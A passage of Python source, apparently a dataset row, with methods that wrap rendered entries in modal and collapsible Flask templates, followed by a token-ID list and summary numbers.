        :return: renderer entry
        """
        # Wrap the fully rendered entry in a modal dialog shell.
        content = self.entry_render(entry)
        return render_template('elements/modal.html',
                               name=entry.name,
                               full_name=entry.full_name,
                               inconsistent=entry.inconsistent,
                               content=content,
                               index=entry.index,
                               )

    def render_collapse(self, entry):
        """render section

        :param entry: container entry for collapse
        :return: renderer entry
        """
        # Wrap the fully rendered entry in a collapsible shell.
        content = self.entry_render(entry)
        return render_template('elements/collapse.html',
                               name=entry.name,
                               full_name=entry.full_name,
                               inconsistent=entry.inconsistent,
                               content=content,
                               index=entry.index,
                               )

    def reload_element(self, entry):
        """Re-render a single entry (used to refresh one element in place).

        :param entry: entry for rerendering
        :return: renderer entry
        """
        content = self.entry_render(entry)
        return content
| [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
42903,
1330,
8543,
62,
28243,
198,
198,
834,
9800,
834,
796,
705,
46,
358,
129,
247,
68,
73,
14730,
46195,
... | 1.729176 | 4,298 |